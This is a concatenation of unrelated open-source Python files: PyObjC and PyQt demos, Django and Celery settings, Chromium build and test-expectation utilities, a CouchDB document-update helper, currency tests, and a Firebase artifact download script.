'Programming Language :: Python',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries :: Python Modules',
],
entry_points={
'console_scripts': [
'sheets-cli = google_objects.cli:main',
],
},
)
|
"""OpenGLDemo.py -- A simple demo of using OpenGL with Cocoa
To build the demo program, run this line in Terminal.app:
$ python setup.py py2app -A
This creates a directory "dist" containing OpenGLDemo.app. (The
-A option causes the files to be symlinked to the .app bundle instead
of copied. This means you don't have to rebuild the app if you edit the
sources or nibs.)
This example requires PyOpenGL
"""
from Cocoa import *
from OpenGL.GL import *
from PyObjCTools import AppHelper
ClearColors = redIndex, greenIndex, blueIndex, alphaIndex = range(4)
class OpenGLDemoView(NSOpenGLView):
def awakeFromNib(self):
self.color_index = alphaIndex
def initWithFrame_(self, frame):
attribs = [
NSOpenGLPFANoRecovery,
NSOpenGLPFAWindow,
NSOpenGLPFAAccelerated,
NSOpenGLPFADoubleBuffer,
NSOpenGLPFAColorSize, 24,
NSOpenGLPFAAlphaSize, 8,
NSOpenGLPFADepthSize, 24,
NSOpenGLPFAStencilSize, 8,
NSOpenGLPFAAccumSize, 0,
]
fmt = NSOpenGLPixelFormat.alloc().initWithAttributes_(attribs)
self = super(OpenGLDemoView, self).initWithFrame_pixelFormat_(frame, fmt)
return self
@objc.IBAction
def setClearColor_(self, sender):
self.color_index = sender.tag()
self.setNeedsDisplay_(True)
def drawRect_(self, ((x, y), (w, h))):
glViewport(0, 0, w, h)
clear_color = [0.0]*4
clear_color[self.color_index] = 1.0
glClearColor(*clear_color)
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT|GL_STENCIL_BUFFER_BIT)
self.openGLContext().flushBuffer()
if __name__ == "__main__":
AppHelper.runEventLoop()
|
from PyQt4.QtCore import QSize
from PyQt4.QtGui import QVBoxLayout
class MyVBoxLayout(QVBoxLayout):
def __init__(self, parent=None):
QVBoxLayout.__init__(self, parent)
self._last_size = QSize(0, 0)
def setGeometry(self, r):
QVBoxLayout.setGeometry(self, r)
try:
wid = self.parentWidget().parentWidget()
new_size = self.minimumSize()
if new_size == self._last_size: return
self._last_size = new_size
twid = wid.titleBarWidget()
if twid is not None:
theight = twid.sizeHint().height()
else:
theight = 0
new_size += QSize(0, theight)
wid.setMinimumSize(new_size)
except Exception:
pass
|
from Foundation import *
from PyObjCTools.TestSupport import *
class TestNSXMLNodeOptions (TestCase):
def testConstants(self):
self.assertEqual(NSXMLNodeOptionsNone, 0)
self.assertEqual(NSXMLNodeIsCDATA, 1 << 0)
self.assertEqual(NSXMLNodeExpandEmptyElement, 1 << 1)
self.assertEqual(NSXMLNodeCompactEmptyElement, 1 << 2)
self.assertEqual(NSXMLNodeUseSingleQuotes, 1 << 3)
self.assertEqual(NSXMLNodeUseDoubleQuotes, 1 << 4)
self.assertEqual(NSXMLDocumentTidyHTML, 1 << 9)
self.assertEqual(NSXMLDocumentTidyXML, 1 << 10)
self.assertEqual(NSXMLDocumentValidate, 1 << 13)
self.assertEqual(NSXMLNodeLoadExternalEntitiesAlways, 1 << 14)
self.assertEqual(NSXMLNodeLoadExternalEntitiesSameOriginOnly, 1 << 15)
self.assertEqual(NSXMLNodeLoadExternalEntitiesNever, 1 << 19)
self.assertEqual(NSXMLDocumentXInclude, 1 << 16)
self.assertEqual(NSXMLNodePrettyPrint, 1 << 17)
self.assertEqual(NSXMLDocumentIncludeContentTypeDeclaration, 1 << 18)
self.assertEqual(NSXMLNodePreserveNamespaceOrder, 1 << 20)
self.assertEqual(NSXMLNodePreserveAttributeOrder, 1 << 21)
self.assertEqual(NSXMLNodePreserveEntities, 1 << 22)
self.assertEqual(NSXMLNodePreservePrefixes, 1 << 23)
self.assertEqual(NSXMLNodePreserveCDATA, 1 << 24)
self.assertEqual(NSXMLNodePreserveWhitespace, 1 << 25)
self.assertEqual(NSXMLNodePreserveDTD, 1 << 26)
self.assertEqual(NSXMLNodePreserveCharacterReferences, 1 << 27)
self.assertEqual(NSXMLNodePreserveEmptyElements, (
NSXMLNodeExpandEmptyElement | NSXMLNodeCompactEmptyElement))
self.assertEqual(NSXMLNodePreserveQuotes, (NSXMLNodeUseSingleQuotes | NSXMLNodeUseDoubleQuotes))
self.assertEqual(NSXMLNodePreserveAll & 0xFFFFFFFF, 0xFFFFFFFF & (
NSXMLNodePreserveNamespaceOrder |
NSXMLNodePreserveAttributeOrder |
NSXMLNodePreserveEntities |
NSXMLNodePreservePrefixes |
NSXMLNodePreserveCDATA |
NSXMLNodePreserveEmptyElements |
NSXMLNodePreserveQuotes |
NSXMLNodePreserveWhitespace |
NSXMLNodePreserveDTD |
NSXMLNodePreserveCharacterReferences |
0xFFF00000))
if __name__ == "__main__":
main()
|
import os.path as path
import sys
root=path.abspath(path.dirname(__file__))
sys.path.insert(0,root)
|
from __future__ import absolute_import
from sentry.models import Activity
from .mail import ActivityMailDebugView
class DebugUnassignedEmailView(ActivityMailDebugView):
def get_activity(self, request, event):
return {"type": Activity.UNASSIGNED, "user": request.user}
|
DEBUG = True
TEMPLATE_DEBUG = DEBUG
CARROT_BACKEND = "amqp"
CELERY_RESULT_BACKEND = "database"
BROKER_HOST = "localhost"
BROKER_VHOST = "/"
BROKER_USER = "guest"
BROKER_PASSWORD = "guest"
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = 'development.db'
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
ADMIN_MEDIA_PREFIX = '/media/'
SECRET_KEY = '#1i=edpk55k3781$z-p%b#dbn&n+-rtt83pgz2o9o)v8g7(owq'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
ROOT_URLCONF = 'celery_http_gateway.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or
# "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'djcelery',
)
|
import logging
logger = logging.getLogger(__name__)
logger.warning('DEPRECATED: pyface.grid, use pyface.ui.wx.grid instead.')
from pyface.ui.wx.grid.inverted_grid_model import *
|
from string import Template
import optparse
import os
import sys
try:
grit_module_path = os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'tools', 'grit')
sys.path.insert(0, grit_module_path)
from grit.format import data_pack as DataPack
except ImportError, e:
print 'ImportError: ', e
sys.exit(-1)
def is_ascii(s):
return all(ord(c) < 128 for c in s)
header_template = \
"""// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
namespace html_viewer {
class BlinkResourceMap {
public:
BlinkResourceMap();
const char* GetResource(int id, int* length);
private:
struct ResourceEntry {
const char* data;
int length;
ResourceEntry()
: data(nullptr)
, length(0) {
}
ResourceEntry(const char* data, int length)
: data(data)
, length(length) {
}
};
typedef std::map<int, ResourceEntry> ResourceMap;
ResourceMap resources_;
};
} // namespace html_viewer
cpp_template = \
"""// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
namespace html_viewer {
$definitions
BlinkResourceMap::BlinkResourceMap()
{
$map_initializer
}
const char* BlinkResourceMap::GetResource(int id, int* length)
{
ResourceMap::iterator it = resources_.find(id);
if (it == resources_.end()) {
*length = 0;
return nullptr;
}
*length = it->second.length;
return it->second.data;
}
} // namespace html_viewer"""
def main():
parser = optparse.OptionParser(
usage='Usage: %prog --pak-file PAK_FILE --header HEADER --cpp CPP\n')
parser.add_option('-i', '--pak-file', action='store', dest='pak_file',
help='The .pak file to be extracted.')
parser.add_option('', '--header', action='store', dest='header_file',
help='Header file to be generated.')
parser.add_option('', '--cpp', action='store', dest='cpp_file',
help='C++ file to be generated.')
(options, _) = parser.parse_args()
if (not options.pak_file or not options.header_file or not options.cpp_file):
parser.print_help()
sys.exit(-1)
header_file = open(options.header_file, 'w+')
cpp_file = open(options.cpp_file, 'w+')
pak_contents = DataPack.ReadDataPack(options.pak_file)
resourceIds = []
header_contents = dict()
cpp_contents = dict()
definitions = []
for (resId, data) in pak_contents.resources.iteritems():
if not is_ascii(data):
continue
resourceIds.append(resId)
hex_values = ['0x{0:02x}'.format(ord(char)) for char in data]
f = lambda A, n=12: [A[i:i+n] for i in range(0, len(A), n)]
hex_values_string = ',\n '.join(', '.join(x) for x in f(hex_values))
cpp_definition = \
'const char kResource%s[%d] = {\n %s \n};' % \
(str(resId), len(hex_values), hex_values_string)
definitions.append(cpp_definition)
header_file_contents = Template(header_template).substitute(header_contents)
header_file.write(header_file_contents)
header_file.close()
map_initializer = []
for resId in resourceIds:
insert_statement = \
'resources_.insert(std::pair<int, ResourceEntry>(\n' \
' %s, ResourceEntry(kResource%s, arraysize(kResource%s))));'
map_initializer.append( \
insert_statement % (str(resId), str(resId), str(resId)))
cpp_contents['definitions']= '\n'.join(definitions)
cpp_contents['header_file_name'] = os.path.basename(options.header_file)
cpp_contents['map_initializer'] = '\n '.join(map_initializer)
cpp_file_contents = Template(cpp_template).substitute(cpp_contents)
cpp_file.write(cpp_file_contents)
cpp_file.close()
if __name__ == '__main__':
main()
|
'''This allows running a bit of code on couchdb docs.
code should take a json python object, modify it and hand back to the code
Not quite that slick yet, need way to pass in code or make this a decorator
'''
import importlib
from harvester.collection_registry_client import Collection
from harvester.couchdb_init import get_couchdb
COUCHDB_VIEW = 'all_provider_docs/by_provider_name'
def run_on_couchdb_by_collection(func, collection_key=None):
'''If collection_key is none, trying to grab all of docs and modify
func is a function that takes a couchdb doc in and returns it modified.
(can take long time - not recommended)
Function should return new document or None if no changes made
'''
_couchdb = get_couchdb()
v = _couchdb.view(COUCHDB_VIEW, include_docs='true', key=collection_key) \
if collection_key else _couchdb.view(COUCHDB_VIEW,
include_docs='true')
doc_ids = []
n = 0
for r in v:
n += 1
doc_new = func(r.doc)
if doc_new and doc_new != doc:
_couchdb.save(doc_new)
doc_ids.append(r.doc['_id'])
if n % 100 == 0:
print '{} docs ran. Last doc:{}\n'.format(n, r.doc['_id'])
return doc_ids
def run_on_couchdb_doc(docid, func):
'''Run on a doc, by doc id'''
_couchdb = get_couchdb()
doc = _couchdb[docid]
mod_name, func_name = func.rsplit('.', 1)
fmod = importlib.import_module(mod_name)
ffunc = getattr(fmod, func_name)
doc_new = ffunc(doc)
if doc_new and doc_new != doc:
_couchdb.save(doc_new)
return True
return False
C_CACHE = {}
def update_collection_description(doc):
cjson = doc['originalRecord']['collection'][0]
# get collection description
if 'description' not in cjson:
if cjson['@id'] in C_CACHE:
c = C_CACHE[cjson['@id']]
else:
c = Collection(url_api=cjson['@id'])
C_CACHE[cjson['@id']] = c
description = c['description'] if c['description'] else c['name']
print('DOC: {} DESCRIP: {}'.format(
doc['_id'], c['description'].encode('utf8')))
doc['originalRecord']['collection'][0]['description'] = description
doc['sourceResource']['collection'][0]['description'] = description
return doc
def add_rights_and_type_to_collection(doc):
cjson = doc['originalRecord']['collection'][0]
# get collection description
if cjson['@id'] in C_CACHE:
c = C_CACHE[cjson['@id']]
else:
c = Collection(url_api=cjson['@id'])
C_CACHE[cjson['@id']] = c
doc['originalRecord']['collection'][0]['rights_status'] = c['rights_status']
doc['originalRecord']['collection'][0]['rights_statement'] = c['rights_statement']
doc['originalRecord']['collection'][0]['dcmi_type']=c['dcmi_type']
if 'collection' in doc['sourceResource']:
doc['sourceResource']['collection'][0]['rights_status'] = c['rights_status']
doc['sourceResource']['collection'][0]['rights_statement'] = c['rights_statement']
doc['sourceResource']['collection'][0]['dcmi_type'] = c['dcmi_type']
else:
doc['sourceResource']['collection'] = doc['originalRecord']['collection']
return doc
|
import pytest
import six
from sqlalchemy_utils import Currency, i18n
@pytest.fixture
def set_get_locale():
i18n.get_locale = lambda: i18n.babel.Locale('en')
@pytest.mark.skipif('i18n.babel is None')
@pytest.mark.usefixtures('set_get_locale')
class TestCurrency(object):
def test_init(self):
assert Currency('USD') == Currency(Currency('USD'))
def test_hashability(self):
assert len(set([Currency('USD'), Currency('USD')])) == 1
def test_invalid_currency_code(self):
with pytest.raises(ValueError):
Currency('Unknown code')
def test_invalid_currency_code_type(self):
with pytest.raises(TypeError):
Currency(None)
@pytest.mark.parametrize(
('code', 'name'),
(
('USD', 'US Dollar'),
('EUR', 'Euro')
)
)
def test_name_property(self, code, name):
assert Currency(code).name == name
@pytest.mark.parametrize(
('code', 'symbol'),
(
('USD', u'$'),
('EUR', u'€')
)
)
def test_symbol_property(self, code, symbol):
assert Currency(code).symbol == symbol
def test_equality_operator(self):
assert Currency('USD') == 'USD'
assert 'USD' == Currency('USD')
assert Currency('USD') == Currency('USD')
def test_non_equality_operator(self):
assert Currency('USD') != 'EUR'
assert not (Currency('USD') != 'USD')
def test_unicode(self):
currency = Currency('USD')
assert six.text_type(currency) == u'USD'
def test_str(self):
currency = Currency('USD')
assert str(currency) == 'USD'
def test_representation(self):
currency = Currency('USD')
assert repr(currency) == "Currency('USD')"
|
"""Various custom data types for use throughout the unexpected pass finder."""
from __future__ import print_function
import collections
import copy
import fnmatch
import logging
import six
FULL_PASS = 1
NEVER_PASS = 2
PARTIAL_PASS = 3
Expectation = None
Result = None
BuildStats = None
TestExpectationMap = None
def SetExpectationImplementation(impl):
global Expectation
assert issubclass(impl, BaseExpectation)
Expectation = impl
def SetResultImplementation(impl):
global Result
assert issubclass(impl, BaseResult)
Result = impl
def SetBuildStatsImplementation(impl):
global BuildStats
assert issubclass(impl, BaseBuildStats)
BuildStats = impl
def SetTestExpectationMapImplementation(impl):
global TestExpectationMap
assert issubclass(impl, BaseTestExpectationMap)
TestExpectationMap = impl
class BaseExpectation(object):
"""Container for a test expectation.
Similar to typ's expectations_parser.Expectation class, but with unnecessary
data stripped out and made hashable.
The data contained in an Expectation is equivalent to a single line in an
expectation file.
"""
def __init__(self, test, tags, expected_results, bug=None):
self.test = test
self.tags = frozenset(tags)
self.bug = bug or ''
if isinstance(expected_results, str):
self.expected_results = frozenset([expected_results])
else:
self.expected_results = frozenset(expected_results)
# We're going to be making a lot of comparisons, and fnmatch is *much*
# slower (~40x from rough testing) than a straight comparison, so only use
# it if necessary.
if '*' in test:
self._comp = self._CompareWildcard
else:
self._comp = self._CompareNonWildcard
def __eq__(self, other):
return (isinstance(other, BaseExpectation) and self.test == other.test
and self.tags == other.tags
and self.expected_results == other.expected_results
and self.bug == other.bug)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.test, self.tags, self.expected_results, self.bug))
def _CompareWildcard(self, result_test_name):
return fnmatch.fnmatch(result_test_name, self.test)
def _CompareNonWildcard(self, result_test_name):
return result_test_name == self.test
def AppliesToResult(self, result):
"""Checks whether this expectation should have applied to |result|.
An expectation applies to a result if the test names match (including
wildcard expansion) and the expectation's tags are a subset of the result's
tags.
Args:
result: A Result instance to check against.
Returns:
True if |self| applies to |result|, otherwise False.
"""
assert isinstance(result, BaseResult)
return (self._comp(result.test) and self.tags <= result.tags)
def MaybeAppliesToTest(self, test_name):
"""Similar to AppliesToResult, but used to do initial filtering.
Args:
test_name: A string containing the name of a test.
Returns:
True if |self| could apply to a test named |test_name|, otherwise False.
"""
return self._comp(test_name)
class BaseResult(object):
"""Container for a test result.
Contains the minimal amount of data necessary to describe/identify a result
from ResultDB for the purposes of the unexpected pass finder.
"""
def __init__(self, test, tags, actual_result, step, build_id):
"""
Args:
test: A string containing the name of the test.
tags: An iterable containing the typ tags for the result.
actual_result: The actual result of the test as a string.
step: A string containing the name of the step on the builder.
build_id: A string containing the Buildbucket ID for the build this result
came from.
"""
self.test = test
self.tags = frozenset(tags)
self.actual_result = actual_result
self.step = step
self.build_id = build_id
def __eq__(self, other):
return (isinstance(other, BaseResult) and self.test == other.test
and self.tags == other.tags
and self.actual_result == other.actual_result
and self.step == other.step and self.build_id == other.build_id)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(
(self.test, self.tags, self.actual_result, self.step, self.build_id))
class BaseBuildStats(object):
"""Container for keeping track of a builder's pass/fail stats."""
def __init__(self):
self.passed_builds = 0
self.total_builds = 0
self.failure_links = frozenset()
@property
def failed_builds(self):
return self.total_builds - self.passed_builds
@property
def did_fully_pass(self):
return self.passed_builds == self.total_builds
@property
def did_never_pass(self):
return self.failed_builds == self.total_builds
def AddPassedBuild(self):
self.passed_builds += 1
self.total_builds += 1
def AddFailedBuild(self, build_id):
self.total_builds += 1
build_link = BuildLinkFromBuildId(build_id)
self.failure_links = frozenset([build_link]) | self.failure_links
def GetStatsAsString(self):
return '(%d/%d passed)' % (self.passed_builds, self.total_builds)
def NeverNeededExpectation(self, expectation): # pylint:disable=unused-argument
"""Returns whether the results tallied in |self| never needed |expectation|.
Args:
expectation: An Expectation object that |stats| is located under.
Returns:
True if all the results tallied in |self| would have passed without
|expectation| being present. Otherwise, False.
"""
return self.did_fully_pass
def AlwaysNeededExpectation(self, expectation): # pylint:disable=unused-argument
"""Returns whether the results tallied in |self| always needed |expectation.
Args:
expectation: An Expectation object that |stats| is located under.
Returns:
True if all the results tallied in |self| would have failed without
|expectation| being present. Otherwise, False.
"""
return self.did_never_pass
def __eq__(self, other):
return (isinstance(other, BuildStats)
and self.passed_builds == other.passed_builds
and self.total_builds == other.total_builds
and self.failure_links == other.failure_links)
def __ne__(self, other):
return not self.__eq__(other)
def BuildLinkFromBuildId(build_id):
return 'http://ci.chromium.org/b/%s' % build_id
class BaseTypedMap(dict):
"""A base class for typed dictionaries.
Any child classes that override __setitem__ will have any modifications to the
dictionary go through the type checking in __setitem__.
"""
def __init__(self, *args, **kwargs): # pylint:disable=super-init-not-called
self.update(*args, **kwargs)
def update(self, *args, **kwargs):
if args:
assert len(args) == 1
other = dict(args[0])
for k, v in other.items():
self[k] = v
for k, v in kwargs.items():
self[k] = v
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def _value_type(self):
raise NotImplementedError()
def IterToValueType(self, value_type):
"""Recursively iterates over contents until |value_type| is found.
Used to get rid of nested loops, instead using a single loop that
automatically iterates through all the contents at a certain depth.
Args:
value_type: The type to recurse to and then iterate over. For example,
"BuilderStepMap" would result in iterating over the BuilderStepMap
values, meaning that the returned generator would create tuples in the
form (test_name, expectation, builder_map).
Returns:
A generator that yields tuples. The length and content of the tuples will
vary depending on |value_type|. For example, using "BuilderStepMap" would
result in tuples of the form (test_name, expectation, builder_map), while
"BuildStats" would result in (test_name, expectation, builder_name,
step_name, build_stats).
"""
if self._value_type() == value_type:
for k, v in self.items():
yield k, v
else:
for k, v in self.items():
for nested_value in v.IterToValueType(value_type):
yield (k, ) + nested_value
def Merge(self, other_map, reference_map=None):
"""Merges |other_map| into self.
Args:
other_map: A BaseTypedMap whose contents will be merged into self.
reference_map: A dict containing the information that was originally in
self. Used for ensuring that a single expectation/builder/step
combination is only ever updated once. If None, a copy of self will be
used.
"""
assert isinstance(other_map, self.__class__)
# We should only ever encounter a single updated BuildStats for an
# expectation/builder/step combination. Use the reference map to determine
# if a particular BuildStats has already been updated or not.
reference_map = reference_map or copy.deepcopy(self)
for key, value in other_map.items():
if key not in self:
self[key] = value
else:
if isinstance(value, dict):
self[key].Merge(value, reference_map.get(key, {}))
else:
assert isinstance(value, BuildStats)
# Ensure we haven't updated this BuildStats already. If the reference
# map doesn't have a corresponding BuildStats, then base_map shouldn't
# have initially either, and thus it would have been added before
# reaching this point. Otherwise, the two values must match, meaning
# that base_map's BuildStats hasn't been updated yet.
reference_stats = reference_map.get(key, None)
assert reference_stats is not None
assert reference_stats == self[key]
self[key] = value
class BaseTestExpectationMap(BaseTypedMap):
"""Typed map for string types -> ExpectationBuilderMap.
This results in a dict in the following format:
{
expectation_file1 (str): {
expectation1 (data_types.Expectation): {
builder_name1 (str): {
step_name1 (str): stats1 (data_types.BuildStats),
step_name2 (str): stats2 (data_types.BuildStats),
...
},
builder_name2 (str): { ... },
},
expectation2 (data_types.Expectation): { ... },
...
},
expectation_file2 (str): { ... },
...
}
"""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, ExpectationBuilderMap)
super(BaseTestExpectationMap, self).__setitem__(key, value)
def _value_type(self):
return ExpectationBuilderMap
def IterBuilderStepMaps(self):
"""Iterates over all BuilderStepMaps contained in the map.
Returns:
A generator yielding tuples in the form (expectation_file (str),
expectation (Expectation), builder_map (BuilderStepMap))
"""
return self.IterToValueType(BuilderStepMap)
def AddResultList(self, builder, results, expectation_files=None):
"""Adds |results| to |self|.
Args:
builder: A string containing the builder |results| came from. Should be
prefixed with something to distinguish between identically named CI
and try builders.
results: A list of data_types.Result objects corresponding to the ResultDB
data queried for |builder|.
expectation_files: An iterable of expectation file names that these
results could possibly apply to. If None, then expectations from all
known expectation files will be used.
Returns:
A list of data_types.Result objects who did not have a matching
expectation in |self|.
"""
failure_results = set()
pass_results = set()
unmatched_results = []
for r in results:
if r.actual_result == 'Pass':
pass_results.add(r)
else:
failure_results.add(r)
# Remove any cases of failure -> pass from the passing set. If a test is
# flaky, we get both pass and failure results for it, so we need to remove
# the any cases of a pass result having a corresponding, earlier failure
# result.
modified_failing_retry_results = set()
for r in failure_results:
modified_failing_retry_results.add(
Result(r.test, r.tags, 'Pass', r.step, r.build_id))
pass_results -= modified_failing_retry_results
# Group identically named results together so we reduce the number of
# comparisons we have to make.
all_results = pass_results | failure_results
grouped_results = collections.defaultdict(list)
for r in all_results:
grouped_results[r.test].append(r)
matched_results = self._AddGroupedResults(grouped_results, builder,
expectation_files)
unmatched_results = list(all_results - matched_results)
return unmatched_results
def _AddGroupedResults(self, grouped_results, builder, expectation_files):
"""Adds all results in |grouped_results| to |self|.
Args:
grouped_results: A dict mapping test name (str) to a list of
data_types.Result objects for that test.
builder: A string containing the name of the builder |grouped_results|
came from.
expectation_files: An iterable of expectation file names that these
results could possibly apply to. If None, then expectations from all
known expectation files will be used.
Returns:
A set of data_types.Result objects that had at least one matching
expectation.
"""
matched_results = set()
for test_name, result_list in grouped_results.items():
for ef, expectation_map in self.items():
if expectation_files is not None and ef not in expectation_files:
continue
for expectation, builder_map in expectation_map.items():
if not expectation.MaybeAppliesToTest(test_name):
continue
for r in result_list:
if expectation.AppliesToResult(r):
matched_results.add(r)
step_map = builder_map.setdefault(builder, StepBuildStatsMap())
stats = step_map.setdefault(r.step, BuildStats())
self._AddSingleResult(r, stats)
return matched_results
def _AddSingleResult(self, result, stats):
"""Adds |result| to |self|.
Args:
result: A data_types.Result object to add.
stats: A data_types.BuildStats object to add the result to.
"""
if result.actual_result == 'Pass':
stats.AddPassedBuild()
else:
stats.AddFailedBuild(result.build_id)
def SplitByStaleness(self):
"""Separates stored data based on expectation staleness.
Returns:
Three TestExpectationMaps (stale_dict, semi_stale_dict, active_dict). All
three combined contain the information of |self|. |stale_dict| contains
entries for expectations that are no longer being helpful,
|semi_stale_dict| contains entries for expectations that might be
removable or modifiable, but have at least one failed test run.
|active_dict| contains entries for expectations that are preventing
failures on all builders they're active on, and thus shouldn't be removed.
"""
stale_dict = TestExpectationMap()
semi_stale_dict = TestExpectationMap()
active_dict = TestExpectationMap()
# This initially looks like a good target for using
# TestExpectationMap's iterators since there are many nested loops.
# However, we need to reset state in different loops, and the alternative of
# keeping all the state outside the loop and resetting under certain
# conditions ends up being less readable than just using nested loops.
for expectation_file, expectation_map in self.items():
for expectation, builder_map in expectation_map.items():
# A temporary map to hold data so we can later determine whether an
# expectation is stale, semi-stale, or active.
tmp_map = {
FULL_PASS: BuilderStepMap(),
NEVER_PASS: BuilderStepMap(),
PARTIAL_PASS: BuilderStepMap(),
}
split_stats_map = builder_map.SplitBuildStatsByPass(expectation)
for builder_name, (fully_passed, never_passed,
partially_passed) in split_stats_map.items():
if fully_passed:
tmp_map[FULL_PASS][builder_name] = fully_passed
if never_passed:
tmp_map[NEVER_PASS][builder_name] = never_passed
if partially_passed:
tmp_map[PARTIAL_PASS][builder_name] = partially_passed
def _CopyPassesIntoBuilderMap(builder_map, pass_types):
for pt in pass_types:
for builder, steps in tmp_map[pt].items():
builder_map.setdefault(builder, StepBuildStatsMap()).update(steps)
# Handle the case of a stale expectation.
if not (tmp_map[NEVER_PASS] or tmp_map[PARTIAL_PASS]):
builder_map = stale_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map, [FULL_PASS])
# Handle the case of an active expectation.
elif not tmp_map[FULL_PASS]:
builder_map = active_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map, [NEVER_PASS, PARTIAL_PASS])
# Handle the case of a semi-stale expectation.
else:
# TODO(crbug.com/998329): Sort by pass percentage so it's easier to
# find problematic builders without highlighting.
builder_map = semi_stale_dict.setdefault(
expectation_file,
ExpectationBuilderMap()).setdefault(expectation, BuilderStepMap())
_CopyPassesIntoBuilderMap(builder_map,
[FULL_PASS, PARTIAL_PASS, NEVER_PASS])
return stale_dict, semi_stale_dict, active_dict
def FilterOutUnusedExpectations(self):
"""Filters out any unused Expectations from stored data.
An Expectation is considered unused if its corresponding dictionary is
empty. If removing Expectations results in a top-level test key having an
empty dictionary, that test entry will also be removed.
Returns:
A dict from expectation file name (str) to set of unused expectations
(str) from that file.
"""
logging.info('Filtering out unused expectations')
unused = collections.defaultdict(list)
unused_count = 0
for (expectation_file, expectation,
builder_map) in self.IterBuilderStepMaps():
if not builder_map:
unused[expectation_file].append(expectation)
unused_count += 1
for expectation_file, expectations in unused.items():
for e in expectations:
del self[expectation_file][e]
logging.debug('Found %d unused expectations', unused_count)
empty_files = []
for expectation_file, expectation_map in self.items():
if not expectation_map:
empty_files.append(expectation_file)
for empty in empty_files:
del self[empty]
logging.debug('Found %d empty files: %s', len(empty_files), empty_files)
return unused
class ExpectationBuilderMap(BaseTypedMap):
"""Typed map for Expectation -> BuilderStepMap."""
def __setitem__(self, key, value):
assert isinstance(key, BaseExpectation)
assert isinstance(value, self._value_type())
super(ExpectationBuilderMap, self).__setitem__(key, value)
def _value_type(self):
return BuilderStepMap
class BuilderStepMap(BaseTypedMap):
"""Typed map for string types -> StepBuildStatsMap."""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, self._value_type())
super(BuilderStepMap, self).__setitem__(key, value)
def _value_type(self):
return StepBuildStatsMap
def SplitBuildStatsByPass(self, expectation):
"""Splits the underlying BuildStats data by passing-ness.
Args:
expectation: The Expectation that this BuilderStepMap is located under.
Returns:
A dict mapping builder name to a tuple (fully_passed, never_passed,
partially_passed). Each *_passed is a StepBuildStatsMap containing data
for the steps that either fully passed on all builds, never passed on any
builds, or passed some of the time.
"""
retval = {}
for builder_name, step_map in self.items():
fully_passed = StepBuildStatsMap()
never_passed = StepBuildStatsMap()
partially_passed = StepBuildStatsMap()
for step_name, stats in step_map.items():
if stats.NeverNeededExpectation(expectation):
assert step_name not in fully_passed
fully_passed[step_name] = stats
elif stats.AlwaysNeededExpectation(expectation):
assert step_name not in never_passed
never_passed[step_name] = stats
else:
assert step_name not in partially_passed
partially_passed[step_name] = stats
retval[builder_name] = (fully_passed, never_passed, partially_passed)
return retval
def IterBuildStats(self):
"""Iterates over all BuildStats contained in the map.
Returns:
A generator yielding tuples in the form (builder_name (str), step_name
(str), build_stats (BuildStats)).
"""
return self.IterToValueType(BuildStats)
class StepBuildStatsMap(BaseTypedMap):
"""Typed map for string types -> BuildStats"""
def __setitem__(self, key, value):
assert IsStringType(key)
assert isinstance(value, self._value_type())
super(StepBuildStatsMap, self).__setitem__(key, value)
def _value_type(self):
return BuildStats
def IsStringType(s):
return isinstance(s, six.string_types)
Expectation = BaseExpectation
Result = BaseResult
BuildStats = BaseBuildStats
TestExpectationMap = BaseTestExpectationMap
|
"""
42. Storing files according to a custom storage system
``FileField`` and its variations can take a ``storage`` argument to specify how
and where files should be stored.
"""
import random
import tempfile
from django.db import models
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
temp_storage_location = tempfile.mkdtemp()
temp_storage = FileSystemStorage(location=temp_storage_location)
class Storage(models.Model):
def custom_upload_to(self, filename):
return 'foo'
def random_upload_to(self, filename):
# This returns a different result each time,
# to make sure it only gets called once.
return '%s/%s' % (random.randint(100, 999), filename)
normal = models.FileField(storage=temp_storage, upload_to='tests')
custom = models.FileField(storage=temp_storage, upload_to=custom_upload_to)
random = models.FileField(storage=temp_storage, upload_to=random_upload_to)
default = models.FileField(storage=temp_storage, upload_to='tests', default='tests/default.txt')
|
from __future__ import print_function
import argparse
import json
import os
_FILE_URL = 'https://dl.google.com/dl/android/maven2/com/google/firebase/firebase-messaging/21.0.1/firebase-messaging-21.0.1.aar'
_FILE_NAME = 'firebase-messaging-21.0.1.aar'
_FILE_VERSION = '21.0.1'
def do_latest():
print(_FILE_VERSION)
def get_download_url(version):
if _FILE_URL.endswith('.jar'):
ext = '.jar'
elif _FILE_URL.endswith('.aar'):
ext = '.aar'
else:
raise Exception('Unsupported extension for %s' % _FILE_URL)
partial_manifest = {
'url': [_FILE_URL],
'name': [_FILE_NAME],
'ext': ext,
}
print(json.dumps(partial_manifest))
